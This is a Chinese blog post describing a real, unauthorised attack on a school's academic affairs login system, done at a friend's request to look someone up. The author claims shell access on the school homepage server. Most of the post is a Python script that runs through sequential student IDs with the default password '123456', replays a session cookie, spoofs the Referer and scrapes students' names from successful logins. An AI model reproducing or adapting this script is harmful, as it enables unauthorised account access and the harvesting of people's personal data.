闲来无事python爆破某教务处

一个朋友让我日进教务处查个人,渗透了半天,学校主页的服务器都有shell了,教务处没拿到。哎,也是,教务处那么容易被黑的话学校还开个蛋。

不过我问了下初始密码和学号分布规律,直接对着接口各种爆破。(单线程。。多线程的懒)

#-*- coding: UTF-8 -*-
__author__ = 'Administrator'

import requests
import sys
reload(sys)
sys.setdefaultencoding('utf8')

for i in range(0,999):
    k = '{:03}'.format(i) #保持学号特性,后三位对齐。
    num = '201303010'+ k
    url = "http://教务处网站/check.asp"
    parm = {
        'user':num,
        'pwd':'123456',
        'c':'1'
    }
    headers = {
        'Cookie':'ASPSESSIONIDCSCDSDSR=CLCIFONDKEBBLMAOJCNEIFPC; web%5Fid=4159967303; jcrj%5Fkc=%B4%F3%D1%A7%C9%FA%D6%B0%D2%B5%B9%E6%BB%AE%D3%EB%BE%CD%D2%B5%D6%B8%B5%BC; jcrj%5Fxt%5Fbh=oa; jcrj%5Fcheck%5Fbz=yes',
        'Referer':'http://教务处网站/index.asp'#过网站的referer验证喽!
    }

    r = requests.post(url,params = parm,headers = headers )
    
    #此处异常处理为了傻逼学生姓名准备
    try:
        con = r.content.decode('gb2312')
    except UnicodeDecodeError:
        con = ''
        pass

    if '密码不对' not in con: #没用html解析库,直接就上的字符串查找
        index = con.find("姓名")+4
        print str(int(num)-1)+":"+con[index:index+4] #图省事,为了2,3,4位姓名的学生我直接读取四位

效果图:

blob.png


本文由Hack Blog原创,如需转载注明原文链接

作者:test 分类:Python 浏览:2943 评论:0
留言列表
发表评论
来宾的头像